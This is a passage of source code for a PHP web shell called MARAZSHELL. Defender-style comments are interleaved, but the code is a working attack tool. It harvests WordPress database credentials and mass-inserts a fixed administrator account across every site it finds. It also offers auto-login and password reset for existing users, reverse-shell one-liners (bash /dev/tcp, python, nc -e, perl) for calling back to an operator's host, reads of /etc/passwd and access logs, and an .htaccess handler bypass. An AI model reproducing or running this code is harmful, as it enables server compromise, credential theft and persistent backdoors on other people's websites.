}
</style>
</style>
</head>
<body>
<div class="info-bar">
<div class="info-left">
<div class="info-item"><span class="info-label">[safe mode]</span> <span class="info-value"><?= @ini_get('safe_mode') ? 'ON' : 'OFF' ?></span></div>
<div class="info-item"><span class="info-label">[h0st]</span> <span class="info-value"><?= php_uname() ?></span></div>
<div class="info-item"><span class="info-label">[s0ftware]</span> <span class="info-value"><?= get_software() ?></span></div>
<div class="info-item"><span class="info-label">[php]</span> <span class="info-value text-accent"><?= phpversion() ?></span></div>
</div>
<div class="info-right">
<div class="status-badges">
<div class="badge-system">MYSQL: <?= check_ext('mysqli') ?></div>
<div class="badge-system">POSTGRES: <?= check_ext('pgsql') ?></div>
<div class="badge-system">MSSQL: <?= check_ext('sqlsrv') ?></div>
<div class="badge-system">ORACLE: <?= check_ext('oci8') ?></div>
<div class="badge-system">CGI: <?= (strpos(php_sapi_name(),'cgi')!==false)?'ON':'OFF' ?></div>
</div>
<?php if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN'): ?>
<button class="btn btn-sm" onclick="toggle('central-wp-lock')" style="background: var(--accent); border-color: var(--accent); color: #fff; height: 28px; font-size: 10px;">
<i class="fas fa-shield-alt"></i> WP-LOCK MANAGER
</button>
<?php endif; ?>
</div>
</div>
<!-- Centralized WP Lock Manager -->
<div id="central-wp-lock" class="hidden" style="position: fixed; top: 70px; right: 20px; z-index: 9999; background: var(--card-bg); border: 1px solid var(--primary); border-radius: 12px; padding: 20px; box-shadow: 0 10px 40px rgba(0,0,0,0.8); min-width: 400px; max-height: 80vh; overflow-y: auto;">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 15px; border-bottom: 1px solid var(--border); padding-bottom: 10px;">
<h4 style="color: var(--primary);"><i class="fas fa-shield-alt"></i> Central WP Lockdown</h4>
<button class="btn btn-sm" onclick="toggle('central-wp-lock')">CLOSE</button>
</div>
<div id="wp-lock-list">
<p style='font-size: 11px; color: var(--text-dim); text-align: center; padding: 20px;'>
Click the shield to load WordPress sites and manage security.
<br><br>
<button class="btn btn-sm" onclick="loadWPLockList(this)" style="background: var(--surface-hover);">LOAD SITES</button>
</p>
</div>
<script>
function loadWPLockList(btn) {
btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> LOADING...';
btn.disabled = true;
fetch('?ajax&action=get_wp_lock_list').then(r => r.text()).then(html => {
document.getElementById('wp-lock-list').innerHTML = html;
});
}
</script>
</div>
<script>
function toggleCentralWPLock(dir, val, btn) {
var fd = new FormData();
fd.append('wp_action', 'toggle_lock');
fd.append('wp_dir', dir);
fd.append('lock_val', val);
btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i>...';
fetch('?ajax', { method: 'POST', body: fd }).then(function(r){ return r.json(); }).then(function(data){
if(data.status === 'success') window.location.reload();
else alert(data.message);
});
}
</script>
<div class="container">
<aside class="animate__animated animate__fadeInLeft">
<div style="margin-bottom: 32px; padding: 0 12px;">
<h2 style="font-weight: 800; font-size: 18px; color: #fff;">MARAZ<span style="color: var(--accent);">SHELL</span></h2>
<p style="font-size: 9px; color: var(--text-muted); letter-spacing: 2px;">V2.0 STABLE</p>
</div>
<nav>
<a href="?p=<?= encodePath(PATH) ?>" class="nav-link <?= !isset($_GET['wp']) && !isset($_GET['winr00t']) && !isset($_GET['linr00t']) && !isset($_GET['scan']) && !isset($_GET['bypasses']) && !isset($_GET['settings']) && !isset($_GET['b4ckd00rcr3at3']) ? 'active' : '' ?>">
<i class="fas fa-folder"></i> File Manager
</a>
<?php if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN'): ?>
<a href="?wp" class="nav-link <?= isset($_GET['wp']) ? 'active' : '' ?>">
<i class="fab fa-wordpress-simple"></i> WP Scanner <span style="font-size: 8px; background: var(--accent); color: #fff; padding: 1px 4px; border-radius: 4px; margin-left: auto;">NEW</span>
</a>
<?php endif; ?>
<a href="?mass_recon" class="nav-link <?= isset($_GET['mass_recon']) ? 'active' : '' ?>">
<i class="fas fa-satellite-dish"></i> Mass Recon
</a>
<a href="?rev_shell" class="nav-link <?= isset($_GET['rev_shell']) ? 'active' : '' ?>">
<i class="fas fa-terminal"></i> RevShell Gen
</a>
<a href="?winr00t" class="nav-link <?= isset($_GET['winr00t']) ? 'active' : '' ?>">
<i class="fas fa-shield-alt"></i> Windows Root
</a>
<a href="?linr00t" class="nav-link <?= isset($_GET['linr00t']) ? 'active' : '' ?>">
<i class="fab fa-linux"></i> Linux Root
</a>
<a href="?scan" class="nav-link <?= isset($_GET['scan']) ? 'active' : '' ?>">
<i class="fas fa-search"></i> Backdoor Scanner
</a>
<a href="?configs" class="nav-link <?= isset($_GET['configs']) ? 'active' : '' ?>">
<i class="fas fa-key"></i> Config Grabber
</a>
<a href="?portscan" class="nav-link <?= isset($_GET['portscan']) ? 'active' : '' ?>">
<i class="fas fa-network-wired"></i> Port Scanner
</a>
<a href="?b4ckd00rcr3at3" class="nav-link <?= isset($_GET['b4ckd00rcr3at3']) ? 'active' : '' ?>">
<i class="fas fa-virus"></i> Backdoor/Infector
</a>
<a href="?bypasses" class="nav-link <?= isset($_GET['bypasses']) ? 'active' : '' ?>">
<i class="fas fa-unlock-alt"></i> Bypasses
</a>
<a href="?db" class="nav-link <?= isset($_GET['db']) ? 'active' : '' ?>">
<i class="fas fa-database"></i> Database Manager
</a>
<a href="?settings" class="nav-link <?= isset($_GET['settings']) ? 'active' : '' ?>">
<i class="fas fa-cog"></i> Settings
</a>
</nav>
</aside>
<main class="animate__animated animate__fadeIn">
<?php if(isset($_GET['wp'])): ?>
<div class="title-section">
<h1>WP <span>SCANNER</span></h1>
<?php if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'): ?>
<p style="color: var(--danger);">WordPress deep-scanner has limited support on Windows. Some paths may not be found.</p>
<?php endif; ?>
<div class="btn-group" style="display: flex; gap: 10px;">
<button class="btn" onclick="window.location.href='?wp&clear_cache=1'"><i class="fas fa-sync"></i> Refresh Cache</button>
<button class="btn" onclick="window.location.href='?wp&deep_search=1'" style="background: var(--surface-hover);"><i class="fas fa-search-location"></i> Deep System Search</button>
<button class="btn btn-primary" onclick="massAdmin()"><i class="fas fa-robot"></i> Mass Admin Exploit</button>
</div>
</div>
<script>
function autoLogin(wp_dir, uid, btn) {
const oldText = btn.innerHTML;
btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i>';
btn.disabled = true;
const fd = new FormData();
fd.append('wp_action', 'auto_login');
fd.append('wp_dir', wp_dir);
fd.append('uid', uid);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
if(data.status === 'success') {
window.open(data.url, '_blank');
} else {
alert(data.message);
}
btn.innerHTML = oldText;
btn.disabled = false;
}).catch(e => {
alert('Error connecting to script');
btn.innerHTML = oldText;
btn.disabled = false;
});
}
function massAdmin() {
if(!confirm('Bu işlem TÜM WordPress sitelerine admin eklemeye çalışacak. Emin misiniz?')) return;
alert('Mass Exploit başlatıldı. Lütfen bekleyin...');
window.location.href = '?wp&mass_admin_run=1';
}
</script>
<?php
// Analyst note: "ADD PATH" handler of the WP Scanner page. The operator posts a
// directory in `manual_wp_path`; every WordPress root found under it is appended to the
// session list `wp_paths_cache`, which the rest of the page iterates over.
if (isset($_POST['manual_wp_path'])) {
$p = trim($_POST['manual_wp_path']);
if ($p && is_dir($p)) {
// Direct hit: the posted directory itself holds a wp-config.php.
if (file_exists($p.'/wp-config.php')) {
$_SESSION['wp_paths_cache'][] = realpath($p);
echo "<div class='card status-on'>Site added: " . htmlspecialchars($p) . "</div>";
} else {
// Otherwise search below the directory. root_log() and root_exec() are defined outside
// this excerpt; presumably root_exec() hands the string to a system shell (confirm).
root_log("[*] Scan started in: $p");
$found_any = false;
// Detection: if root_exec() shells out, process telemetry shows the web-server/PHP
// worker spawning `find "<dir>" -maxdepth 3 -type f -name 'wp-config.php'`
// (or `dir /s /b "<dir>\wp-config.php"` on Windows). A web worker enumerating
// wp-config.php files is a strong hunting signal on shared hosting.
$cmd = "find \"$p\" -maxdepth 3 -type f -name 'wp-config.php' 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $cmd = "dir /s /b \"$p\\wp-config.php\"";
$res = root_exec($cmd);
// One result path per output line; only paths that exist on disk are kept, and the
// directory containing each wp-config.php is stored.
foreach(explode("\n", trim($res)) as $l) {
if (trim($l) && file_exists(trim($l))) {
$_SESSION['wp_paths_cache'][] = dirname(realpath(trim($l)));
$found_any = true;
}
}
if ($found_any) echo "<div class='card status-on'>WordPress sites found in subdirectories of " . htmlspecialchars($p) . "!</div>";
else echo "<div class='card status-off'>No WordPress found in " . htmlspecialchars($p) . " (Checked subdirs too).</div>";
}
} else {
echo "<div class='card status-off'>Invalid Directory: " . htmlspecialchars($p) . "</div>";
}
}
// Analyst note: "Deep System Search" (`?wp&deep_search=1`). Enumerates WordPress
// installations outside the compromised site's own docroot and merges them into the
// session list `wp_paths_cache`. Scope for incident response: every path this search can
// reach with the web-server account's permissions should be treated as potentially
// touched by the other modules of this file.
if (isset($_GET['deep_search'])) {
// root_find_scan_base() is defined outside this excerpt (starting directory unknown here).
$base = root_find_scan_base();
// Each test is a substring match on the whole path, not on the last segment; every match
// moves the starting point one directory up.
if (strpos($base, 'public_html') !== false) $base = dirname($base);
if (strpos($base, 'www') !== false) $base = dirname($base);
if (strpos($base, 'public') !== false) $base = dirname($base);
root_log("[*] Deep search started for WordPress in $base...");
// Detection: `find <base> -maxdepth 8 -type f -name 'wp-config.php'` (or the `dir /s /b`
// form on Windows) launched by the PHP worker, assuming root_exec() shells out (confirm).
$cmd = "find $base -maxdepth 8 -type f -name 'wp-config.php' 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$cmd = "dir /s /b \"$base\\wp-config.php\"";
}
$res = root_exec($cmd);
$lines = explode("\n", trim($res));
$found_deep = [];
foreach($lines as $l) {
$l = trim($l);
if ($l && file_exists($l)) $found_deep[] = dirname(realpath($l));
}
if (!empty($found_deep)) {
$_SESSION['wp_paths_cache'] = array_unique(array_merge($_SESSION['wp_paths_cache'] ?? [], $found_deep));
echo "<div class='card status-on'><i class='fas fa-check-circle'></i> Deep Search found " . count($found_deep) . " installations!</div>";
} else {
// Fallback: fixed list of common hosting roots, each searched with -maxdepth 5.
// Mitigation: per-site OS accounts and directory permissions that stop one site's
// web user from listing these roots limit what this branch can enumerate.
$roots = ['/home', '/var/www', '/domains', '/home/domains', 'C:\\inetpub\\vhosts', 'C:\\Users\\Public'];
foreach($roots as $r) {
if (@is_dir($r)) {
$cmd = "find $r -maxdepth 5 -type f -name 'wp-config.php' 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $cmd = "dir /s /b \"$r\\wp-config.php\"";
$res = root_exec($cmd);
$lines = explode("\n", trim($res));
foreach($lines as $l) {
if (trim($l) && file_exists(trim($l))) $found_deep[] = dirname(realpath(trim($l)));
}
}
}
if (!empty($found_deep)) {
$_SESSION['wp_paths_cache'] = array_unique(array_merge($_SESSION['wp_paths_cache'] ?? [], $found_deep));
echo "<div class='card status-on'>Aggressive Search found " . count($found_deep) . " installations!</div>";
} else {
echo "<div class='card status-off'>System scan found nothing. Try manual entry.</div>";
}
}
}
?>
<div class="card" style="margin-bottom: 25px; background: rgba(0,0,0,0.4); border-color: #333;">
<form method="post" style="display: flex; gap: 10px; align-items: center;">
<i class="fas fa-search-location text-dim" style="margin-left: 10px;"></i>
<input type="text" name="manual_wp_path" placeholder="Enter manual path (e.g. /home/user/public_html or C:\inetpub\wwwroot)" style="flex: 1; border: none; background: transparent;">
<button type="submit" class="btn btn-sm" style="border: 1px solid var(--border);">ADD PATH</button>
</form>
</div>
<?php
// `?wp&clear_cache=1` drops the session list of discovered WordPress paths.
if(isset($_GET['clear_cache'])) { unset($_SESSION['wp_paths_cache']); header("Location: ?wp"); exit; }
// Analyst note: "Mass Admin Exploit" (`?wp&mass_admin_run=1`). For every discovered
// WordPress directory it obtains the database settings through wp_get_db_config()
// (defined outside this excerpt; presumably parsed from wp-config.php), connects with
// those credentials, and calls wp_add_admin() (also outside this excerpt; presumably
// creates an administrator account) with fixed values.
//
// Indicators and response, all taken from the call below:
//   - hunt in each site's users table for login `root_admin` / e-mail `admin@root.com`;
//   - the count printed at the end ("sites modified") is the number of calls that
//     returned truthy, i.e. the operator's own tally of affected sites;
//   - every database whose credentials were readable must be treated as exposed:
//     rotate the DB passwords and WordPress salts, then review all administrator rows,
//     not only the fixed account, because other modules of this file create accounts
//     with operator-chosen names.
if(isset($_GET['mass_admin_run'])) {
$dirs = wp_find_paths(100);
if (isset($_SESSION['wp_paths_cache'])) $dirs = array_unique(array_merge($dirs, $_SESSION['wp_paths_cache']));
$success_count = 0;
// $results_msg is assigned here but not read again in the visible lines.
$results_msg = "<b>🚀 Mass Admin Exploit Report</b>\n";
foreach($dirs as $d) {
$cfg = wp_get_db_config($d);
if ($cfg) {
// Connection errors are suppressed; unreachable databases are skipped silently.
$mysqli = @new mysqli($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']);
if(!$mysqli->connect_errno) {
if(wp_add_admin($mysqli, $cfg['prefix'], 'root_admin', 'root123!@#', 'admin@root.com')) $success_count++;
$mysqli->close();
}
}
}
echo "<div class='card status-on'>MASS EXPLOIT FINISHED: $success_count sites modified.</div>";
}
$wp_dirs = wp_find_paths(60);
if (isset($_SESSION['wp_paths_cache']) && is_array($_SESSION['wp_paths_cache'])) {
$wp_dirs = array_unique(array_merge($wp_dirs, $_SESSION['wp_paths_cache']));
}
if (empty($wp_dirs)): ?>
<div class="card" style="text-align: center; padding: 100px;">
<h3 style="color: var(--text-dim);"><i class="fas fa-folder-open"></i> No WordPress installations detected automatically.</h3>
<p style="font-size: 13px; margin-top: 10px;">Try "Deep System Search" or enter a manual path above.</p>
</div>
<?php else: ?>
<div style='margin-bottom: 15px; font-size: 11px; color: var(--text-dim); padding: 0 5px;'>SHOWING <?= count($wp_dirs) ?> POTENTIAL WP INSTALLATIONS:</div>
<?php
foreach ($wp_dirs as $wp_dir):
if (empty($wp_dir)) continue;
$cfg = wp_get_db_config($wp_dir);
$wp_version = wp_get_version($wp_dir);
$dir_id = md5($wp_dir);
$mysqli = null;
if (class_exists('mysqli') && $cfg) {
$mysqli = mysqli_init();
$mysqli->options(MYSQLI_OPT_CONNECT_TIMEOUT, 1);
@$mysqli->real_connect($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']);
}
?>
<div class="card" style="margin-bottom: 25px;">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 15px; border-bottom: 1px solid var(--border); padding-bottom: 10px;">
<div>
<?php
$site_url = "";
if ($mysqli && !$mysqli->connect_errno) $site_url = get_site_url($mysqli, $cfg['prefix']);
$display_name = $site_url ? parse_url($site_url, PHP_URL_HOST) : basename($wp_dir);
if (empty($display_name)) $display_name = "WordPress Site";
?>
<span class="badge-system" style="color: var(--primary); background: rgba(0, 112, 243, 0.1);">V<?= $wp_version ?></span>
<b style="font-size: 16px; margin-left: 10px; color: var(--accent);"><?= htmlspecialchars($display_name) ?></b>
<span style="font-size: 10px; color: var(--text-dim); margin-left:10px;"><?= htmlspecialchars($wp_dir) ?></span>
<?php
if ($mysqli && !$mysqli->connect_errno) {
$whl = wp_get_hide_login($mysqli, $cfg['prefix']);
if ($whl) {
echo "<div style='margin-top: 10px; padding: 10px; background: rgba(255, 152, 0, 0.1); border: 1px solid rgba(255, 152, 0, 0.2); border-radius: 8px; color: #ff9800; font-size: 13px; font-weight: bold;'>
<i class='fas fa-mask'></i> [DETECTED] WPS Hide Login: <span style='color: #fff; text-decoration: underline;'>/" . htmlspecialchars($whl) . "</span>
</div>";
}
}
?>
</div>
<div style="display: flex; gap: 10px; align-items: center;">
<?php if ($site_url): ?>
<a href="<?= htmlspecialchars($site_url) ?>" target="_blank" class="btn btn-sm" style="background: rgba(0,255,0,0.05);"><i class="fas fa-external-link-alt"></i></a>
<?php endif; ?>
<?php if ($mysqli && !$mysqli->connect_errno): ?>
<button class="btn btn-sm" onclick="toggle('admin_form_<?= $dir_id ?>')"><i class="fas fa-user-plus"></i> ADD ADMIN</button>
<span class="status-on">DB OK</span>
<?php else: ?>
<span class="status-off"><?= !$cfg ? 'NO CONFIG' : ($mysqli ? 'DB ERR' : 'NO MYSQLI') ?></span>
<?php endif; ?>
</div>
</div>
<?php if ($mysqli && !$mysqli->connect_errno):
$users = wp_fetch_users($mysqli, $cfg['prefix']);
?>
<div id="admin_form_<?= $dir_id ?>" class="hidden" style="background: rgba(0,0,0,0.2); padding: 15px; border-radius: 8px; margin-bottom: 20px; border: 1px solid var(--border);">
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(150px, 1fr)); gap: 10px;">
<input type="text" id="add_user_<?= $dir_id ?>" value="admin_<?= rand(11,99) ?>" placeholder="User">
<input type="text" id="add_pass_<?= $dir_id ?>" value="yesim<?= rand(100,999) ?>!" placeholder="Pass">
<input type="text" id="add_email_<?= $dir_id ?>" value="wp_<?= rand(1,99) ?>@root.com" placeholder="Email">
<button class="btn btn-primary" onclick="addAdmin('<?= addslashes($wp_dir) ?>', '<?= $dir_id ?>', this)">CREATE</button>
</div>
</div>
<table class="data-table">
<thead><tr><th>ID</th><th>User</th><th>Role</th><th>Email</th><th>Actions</th></tr></thead>
<tbody>
<?php foreach($users as $u): ?>
<tr>
<td><?= $u['ID'] ?></td>
<td><b><?= htmlspecialchars($u['user_login']) ?></b></td>
<td><span class="badge-system"><?= $u['role'] ?></span></td>
<td style="font-size: 11px; color: var(--text-dim);"><?= htmlspecialchars($u['user_email']) ?></td>
<td>
<div style="display: flex; gap: 5px;">
<button class="btn btn-sm" style="background: var(--accent); color: #fff;" onclick="autoLogin('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>, this)"><i class="fas fa-sign-in-alt"></i> AUTO LOGIN</button>
<input type="text" id="p_<?= $u['ID'] ?>_<?= $dir_id ?>" value="yesim<?= rand(100,999) ?>!" style="width:80px; font-size: 10px;">
<button class="btn btn-sm" onclick="resetPassword('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>, 'p_<?= $u['ID'] ?>_<?= $dir_id ?>', this)">SET</button>
<button class="btn btn-sm btn-danger" onclick="deleteUser('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>)"><i class="fas fa-trash"></i></button>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php else: ?>
<div style="padding: 15px; background: rgba(255, 0, 0, 0.05); border: 1px solid rgba(255, 0, 0, 0.1); border-radius: 8px;">
<div style="display: flex; gap: 20px; font-family: 'JetBrains Mono', monospace; font-size: 11px; flex-wrap: wrap;">
<div style="flex: 1; min-width: 250px;">
<b style="color: var(--primary); display: block; margin-bottom: 5px; font-size: 10px;">CREDENTIALS FOUND:</b>
<div style="color: var(--text-dim);">
HOST: <span style="color: #fff;"><?= htmlspecialchars($cfg['host'] ?? 'N/A') ?></span><br>
USER: <span style="color: #fff;"><?= htmlspecialchars($cfg['user'] ?? 'N/A') ?></span><br>
PASS: <span style="color: #fff;"><?= htmlspecialchars($cfg['pass'] ?? 'N/A') ?></span><br>
DB: <span style="color: #fff;"><?= htmlspecialchars($cfg['db'] ?? 'N/A') ?></span>
</div>
</div>
<div style="flex: 1; border-left: 1px solid var(--border); padding-left: 20px; min-width: 250px;">
<b style="color: #f00; display: block; margin-bottom: 5px; font-size: 10px;">CONNECTION ERROR:</b>
<span style="color: rgba(255,255,255,0.4);"><?= $mysqli ? htmlspecialchars($mysqli->connect_error) : (!$cfg ? 'wp-config.php not readable/found' : 'MySQLi Extension Missing') ?></span>
</div>
</div>
</div>
<?php endif; ?>
</div>
<?php endforeach; endif; ?>
<?php elseif(isset($_GET['mass_recon'])): ?>
<div class="title-section">
<h1>MASS <span>RECON</span></h1>
<p style="color: var(--text-dim);">Deep Server Analysis & Vulnerability Hunt</p>
</div>
<div class="card">
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 15px; margin-bottom: 20px;">
<div class="badge-system" style="padding:15px; background: rgba(0, 112, 243, 0.05); border: 1px solid rgba(0, 112, 243, 0.2);">
<i class="fas fa-database text-primary"></i> <b>MySQL Binary</b><br>
<span style="font-size: 10px; color: var(--text-dim);"><?= root_exec("which mysql || find /usr -name mysql -type f 2>/dev/null | head -n 1") ?: 'Not found' ?></span>
</div>
<div class="badge-system" style="padding:15px; background: rgba(0, 112, 243, 0.05); border: 1px solid rgba(0, 112, 243, 0.2);">
<i class="fas fa-user-shield text-primary"></i> <b>Sudoers Status</b><br>
<span style="font-size: 10px; color: var(--text-dim);"><?= root_exec("ls -l /etc/sudoers 2>/dev/null") ?: 'Access Denied' ?></span>
</div>
<div class="badge-system" style="padding:15px; background: rgba(0, 112, 243, 0.05); border: 1px solid rgba(0, 112, 243, 0.2);">
<i class="fas fa-server text-primary"></i> <b>V-Hosts Count</b><br>
<span style="font-size: 10px; color: var(--text-dim);"><?= (int)root_exec("ls /etc/apache2/sites-enabled /etc/nginx/sites-enabled 2>/dev/null | wc -l") ?> Configured</span>
</div>
</div>
<h3 style="margin-bottom: 15px; font-size: 14px;"><i class="fas fa-history"></i> Readable Access Logs Search</h3>
<pre style="max-height: 250px; font-size: 10px;"><?php
// Analyst note: "Readable Access Logs Search" on the Mass Recon page. Prints the last
// lines of web-server access logs that the PHP process is able to read.
// Mitigation: these reads only succeed when the web-server account has read access to
// the log files; with logs owned by root/adm and not world-readable, this block falls
// through to the "No readable access logs" message at the end.
$log_files = ['/var/log/apache2/access.log', '/var/log/nginx/access.log', '/usr/local/apache/logs/access_log', '/var/log/httpd/access_log', '/var/log/apache/access.log'];
$output = "";
foreach($log_files as $lf) {
if(@is_readable($lf)) {
// root_exec() is defined outside this excerpt; presumably runs `tail` in a shell (confirm).
$output .= "[+] LOG FOUND: $lf\n" . root_exec("tail -n 10 $lf") . "\n\n";
}
}
// Fallback when none of the fixed paths is readable: up to three readable files under
// /var/log whose name contains "access".
if(empty($output)) {
$find_logs = root_exec("find /var/log -name '*access*' -type f -readable 2>/dev/null | head -n 3");
if($find_logs) {
foreach(explode("\n", trim($find_logs)) as $lf) {
if($lf) $output .= "[+] AUTO-DETECTED LOG: $lf\n" . root_exec("tail -n 5 $lf") . "\n\n";
}
}
}
// The collected text is echoed as-is into the surrounding <pre> element.
echo $output ?: '[!] No readable access logs found with current privileges.';
?></pre>
<h3 style="margin-top: 20px; margin-bottom: 15px; font-size: 14px;"><i class="fas fa-users"></i> System Users (/etc/passwd)</h3>
<pre style="max-height: 200px; font-size: 10px;"><?= root_exec("cat /etc/passwd | head -n 20") ?></pre>
</div>
<?php elseif(isset($_GET['rev_shell'])): ?>
<div class="title-section">
<h1>REVSHELL <span>GENERATOR</span></h1>
<p style="color: var(--text-dim);">Instant persistent access payloads</p>
</div>
<div class="card" style="max-width: 800px;">
<div style="display: grid; grid-template-columns: 1fr 150px; gap: 15px; margin-bottom: 25px;">
<div>
<label style="display:block; font-size: 10px; color: var(--primary); margin-bottom: 5px;">TARGET IP (LHOST)</label>
<input type="text" id="rs_ip" value="<?= $_SERVER['REMOTE_ADDR'] ?>" style="width: 100%;">
</div>
<div>
<label style="display:block; font-size: 10px; color: var(--primary); margin-bottom: 5px;">PORT (LPORT)</label>
<input type="text" id="rs_port" value="4444" style="width: 100%;">
</div>
</div>
<div style="display: grid; gap: 15px;">
<?php
$shells = [
'Bash TCP' => 'bash -i >& /dev/tcp/{IP}/{PORT} 0>&1',
'Python' => 'python -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")\'',
'PHP fsockopen' => 'php -r \'$sock=fsockopen("{IP}",{PORT});exec("/bin/sh -i <&3 >&3 2>&3");\'',
'Netcat Traditional' => 'nc -e /bin/sh {IP} {PORT}',
'Perl' => 'perl -e \'use Socket;$i="{IP}";$p={PORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
];
foreach($shells as $name => $cmd): ?>
<div class="badge-system" style="padding: 15px; background: rgba(255,255,255,0.02); text-align: left; border: 1px solid rgba(255,255,255,0.05);">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 10px;">
<b style="color: var(--accent); font-size: 12px;"><?= $name ?></b>
<button class="btn btn-sm" onclick="copyShell(this)" style="padding: 2px 10px;">COPY</button>
</div>
<div class="shell-tpl" style="font-family: 'JetBrains Mono', monospace; font-size: 11px; background: #000; padding: 10px; border-radius: 4px; border: 1px solid #222; color: #0f0; word-break: break-all; white-space: pre-wrap; cursor: pointer;" onclick="copyShell(this.previousElementSibling.querySelector('button'))"><?= htmlspecialchars($cmd) ?></div>
</div>
<?php endforeach; ?>
</div>
<script>
// Clipboard helper for the template cards rendered above this script.
// It reads the operator-entered address and port fields (rs_ip, rs_port),
// substitutes them for the {IP}/{PORT} placeholders in the card text and copies
// the result. Nothing in this function runs a command on the server; the
// substitution and the copy happen entirely in the operator's browser.
// Defender note: the copied text only turns into host activity if it is later
// run through one of the shell's execution features. The observable sign would
// be the web-server worker spawning an interpreter or netcat with an outbound
// TCP connection, which egress filtering on the web tier limits.
function copyShell(btn) {
const ip = document.getElementById('rs_ip').value;
const port = document.getElementById('rs_port').value;
// The button sits in the card header; the template text is the header's next sibling.
const container = btn.parentElement.nextElementSibling;
let text = container.innerText.replace(/{IP}/g, ip).replace(/{PORT}/g, port);
// Legacy clipboard path: a temporary textarea plus document.execCommand('copy').
const tempInput = document.createElement('textarea');
tempInput.value = text;
document.body.appendChild(tempInput);
tempInput.select();
document.execCommand('copy');
document.body.removeChild(tempInput);
// Visual feedback only; reverts after two seconds.
btn.innerText = 'COPIED!';
btn.classList.add('btn-primary');
setTimeout(() => { btn.innerText = 'COPY'; btn.classList.remove('btn-primary'); }, 2000);
}
</script>
</div>
<?php elseif(isset($_GET['bypasses'])): ?>
<div class="title-section">
<h1>SECURITY <span>BYPASSES</span></h1>
<p style="color: var(--text-dim);">Advanced Environment Escape Modules</p>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-microchip text-primary"></i> 1. PHP.INI / Disable Functions Override</h3>
<p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Trying to override restricted environment settings using available methods.</p>
<div style="background: rgba(0,0,0,0.3); padding: 15px; border-radius: 8px; border: 1px solid var(--border);">
<div style="margin-bottom: 10px;">Method: <b>ini_set / ini_restore Evasion</b></div>
<?php
// Attempts a runtime override of two restriction directives and then reports
// on them by re-reading the values. Both ini_set() calls are @-suppressed, so a
// refused change produces no visible error.
// Defender note: the labels below depend only on the truthiness of ini_get().
// A directive the running PHP does not define reads as false and is printed as
// "BYPASSED" whether or not anything changed, so this output is not evidence
// that a restriction was lifted.
// Hardening: values set with php_admin_value / php_admin_flag in the server or
// FPM pool configuration cannot be changed by ini_set() from a script.
@ini_set('safe_mode', '0'); @ini_set('open_basedir', 'none');
echo "Safe Mode Attempt: " . (@ini_get('safe_mode') ? '<span class="status-off">STILL ON</span>' : '<span class="status-on">BYPASSED / OFF</span>') . "<br>";
echo "Open Basedir Attempt: " . (@ini_get('open_basedir') ? '<span class="text-primary">' . @ini_get('open_basedir') . '</span>' : '<span class="status-on">NONE / BYPASSED</span>');
?>
</div>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-terminal text-primary"></i> 2. Execution Method Scanner</h3>
<p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Scanning for active command execution primitives.</p>
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(150px, 1fr)); gap: 10px;">
<?php
// Capability probe: for each name in the list, prints ACTIVE when
// function_exists() reports it and DISABLED otherwise. Nothing is executed here.
// Defender note: this is reconnaissance of the PHP hardening state. Functions
// listed in disable_functions report as unavailable in this check. A request
// for the ?bypasses view in access logs indicates an operator was assessing
// the host.
// NOTE(review): 'python_eval' is not a PHP core function; presumably it probes
// for an extension - not verifiable from this file.
$primitives = ['system','shell_exec','passthru','exec','popen','proc_open','pcntl_exec','python_eval'];
foreach($primitives as $p) {
$status = function_exists($p) ? '<span class="status-on">ACTIVE</span>' : '<span class="status-off">DISABLED</span>';
echo "<div style='background:rgba(255,255,255,0.03); padding: 10px; border-radius: 6px;'><b>$p:</b> $status</div>";
}
?>
</div>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-file-export text-primary"></i> 3. HTACCESS Shell Bypass</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Creates an .htaccess file to allow execution of custom extensions or specific handlers.</p>
<form method="post">
<button type="submit" name="do_htaccess_bypass" class="btn">DEPLOY HTACCESS BYPASS</button>
<?php if(isset($_POST['do_htaccess_bypass'])):
// Writes a .htaccess file (relative path, so into the script's current working
// directory) that maps the custom ".root" extension to the PHP handler. Files
// with that extension in the directory would then be executed as PHP.
// file_put_contents() is called without an append flag, so an existing
// .htaccess at that path is replaced.
// Detection: file-integrity monitoring on .htaccess files under the web root;
// look for AddType / SetHandler lines naming application/x-httpd-php and for
// files ending in .root.
// Mitigation: with "AllowOverride None" (or without the FileInfo class) Apache
// ignores these directives; keep the web root non-writable by the PHP user.
$ht = "AddType application/x-httpd-php .root\n<Files *.root>\n SetHandler application/x-httpd-php\n</Files>";
